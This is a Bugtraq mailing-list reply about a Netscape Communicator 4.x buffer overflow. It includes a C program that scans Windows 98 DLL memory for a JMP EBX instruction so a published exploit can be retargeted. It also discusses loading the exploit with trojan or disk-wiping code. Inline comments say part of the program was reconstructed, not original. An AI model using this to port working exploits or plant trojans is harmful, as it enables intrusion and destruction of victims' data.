Subject: Re: Netscape communicator 4.06J, 4.5J-4.6J, 4.61e Buffer Overflow
To: BUGTRAQ@SECURITYFOCUS.COM

Hello

David Parker writes:
> I tried the 4 exploit test links, and they all crashed Netscape but
> didn't cause any bluescreens or run any programs. I have win98,
> Netscape 4.5 128-bit, and the same msvcrt.dll (6.00.8397). I'm not
> sure how to debug the crashes, so I'm including the illegal operation
> errors, hopefully they will be of some help:

We could confirm that the exploit code published at the demo site was
executed. We think that the reason you could not confirm that the
exploit code executed is the difference in the Windows kernel code.

The exploit code posted by R00tZer0 is for Japanese Windows 98; this
exploit uses the code located at 0xbff7a06b. On Japanese Windows 98, a
JMP EBX (FFh, E3h) instruction is located at that address. If you remake
the exploit code so that it exploits the specified Netscape
Communicators, you have to change the address specified in the exploit
code. We don't have an English Windows environment, so we could not
write code for English Windows.

Maybe you will be able to get the address of the JMP EBX code with the
following program. So, if someone succeeds or can get the address at
which the JMP EBX code is written, please tell us the address of the
JMP EBX code.

#include <stdio.h>   /* the header names were stripped from the archived posting; stdio.h is needed for FILE/fprintf */
#include <stdlib.h>  /* second header name also lost; stdlib.h assumed */

/* Address ranges (start, end pairs) of the shared system DLLs to scan on
   Japanese Windows 98. The list is terminated by the pair 0,0. */
unsigned int mems[]={
    0xbfb70000,0xbfbfc000,
    0xbfde0000,0xbfde6000,
    0xbfdf0000,0xbfdf5000,
    0xbfe00000,0xbfe10000,
    0xbfe30000,0xbfe43000,
    0xbfe80000,0xbfe86000,
    0xbfe90000,0xbfe96000,
    0xbfea0000,0xbfeb0000,
    0xbfee0000,0xbfee5000,
    0xbff20000,0xbff47000,
    0xbff50000,0xbff61000,
    0xbff70000,0xbffc6000,
    0xbffc9000,0xbffe3000,
    0,0};

/* Print every address in [st, ed) at which the byte pair c1,c2 occurs. */
void search_mem(FILE *fp,unsigned char *st,unsigned char *ed,
                unsigned char c1,unsigned char c2)
{
    unsigned char *p;
    fprintf(fp,"Result : %x - %x\n",(unsigned int)st,(unsigned int)ed);
    /* The archived posting is cut off after "for (p=st;p"; the rest of
       this loop and main() below are reconstructed from the function
       signature and the text, which says the program locates the
       JMP EBX (FF E3) code. */
    for (p=st;p<ed-1;p++)
        if (p[0]==c1 && p[1]==c2)
            fprintf(fp,"%x\n",(unsigned int)p);
}

int main(void)
{
    int i;
    FILE *fp=fopen("result.txt","w");  /* output file name is assumed */
    if (fp==NULL) return 1;
    /* Walk the start/end pairs until the 0,0 terminator. */
    for (i=0;mems[i]!=0;i+=2)
        search_mem(fp,(unsigned char *)mems[i],(unsigned char *)mems[i+1],
                   0xff,0xe3);
    fclose(fp);
    return 0;
}

> When I went there with NC 4.05, it gave me a blue screen of death that was
> completely unrecoverable. I had to reboot the system.
> So, basically, it is a DoS for Netscape users, could possibly be coded
> into a CGI or Javascript that checks browser
> version and writes the corresponding exploit code. Just a thought.

The CGIs which are published at the demo site are not for a DoS attack.
Of course, we could develop code for a DoS attack. We could also develop
HDD format code, virus code, trojan code, and so on. If trojan code is
written into the exploit code, all visitors' PCs will be cracked, and if
HDD format code is written, the visitors' HDDs will be wiped completely.
It is a very serious problem. In this case, the stack area that can be
used for exploit code is wide enough. I will post the demo programs
which can send the trojan by using the security hole in other
applications.

-----
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Webmaster / UNYUN (shadowpenguin@backsection.net)